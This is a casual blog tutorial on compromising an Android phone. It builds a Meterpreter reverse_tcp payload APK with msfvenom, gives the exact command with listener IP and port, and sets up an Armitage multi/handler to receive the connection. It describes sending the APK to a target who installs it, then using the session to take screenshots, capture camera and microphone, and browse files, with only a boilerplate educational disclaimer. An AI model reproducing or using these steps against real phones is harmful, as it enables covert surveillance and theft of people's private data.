Hacking android with armitage
Read Time2 Minutes, 52 Seconds

Welcome to hacking a rise Im the Laughingman and this is how to hack a android phone with armitage i will be doing a local hack as im to lazy to find a target to show ye but i will make is as real as i can lol the method is the same only thing different is u need to open ur ports via router to hack someone on another network so let get started what we will be using is msfvemon and armitage this are all part metasploit witch comes installed on kali linux and parrot the two main os we use here at hacking a rise

What is Armitage

Armitage is nothing but a GUI tool for performing and managing all the tasks that otherwise could have been performed through msfconsole. Armitage helps visualize the targets, automatically recommends suitable exploits, and exposes the advanced post-exploitation
source :

What is Msfvenom

MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom replaced both msfpayload and msfencode as of June 8th, 2015. The advantages of msfvenom are: One single tool. Standardized command line options
source :

How to make the payload with msfvenom

right lads and gals first of all we open a terminal and type msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port > filename.apk
this will make the apk file with te payload into get the ip type ifconfig

as u see my local ip is 192.168.178.26 no we run msfvenom so im typing msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.26 LPORT=4444 >hackingarise.apk we hit enter now and let it build the payload

now open terminal and type service postgresql start

now we can run armitage so go to the exploits in the main menu and click armitage or in terminal type armitage

it will now ask to start metasploit u wanna hit yes and with for it to connect

once it is connected it will load up armitage as u see in the pic the modules are in the left hand side and console on the bottom and the targets on the right of the panel but this not importing for now

on the left hand were the modules are u see a empty text box in there type multi/handler

now we click it and a little box will pop up asking us for the local host port and the payload we are using so we type in the lhost my ip but its allready set so we move to the local port witch is 4444 and the payload is android/meterpreter/reverse_tcp

now before we hit launch we send the payload to the target and hit launch once the target downloads and installs the payload it will pop up in the right and bottom of the panel

boom we have a seesion

now we can make commands like screenshots and take pics with cams record from the mic view files what ever we want .

DISCLAMER

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and https://hackingarise.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law

0 0

About Post Author

Laughingman

Hi im the laughing man im a pentester and the owner of Hacking a rise
0 %
Happy
0 %
Sad
0 %
Excited
0 %
Angry
0 %
Surprise
pentester
Hi im the laughing man im a pentester and the owner of Hacking a rise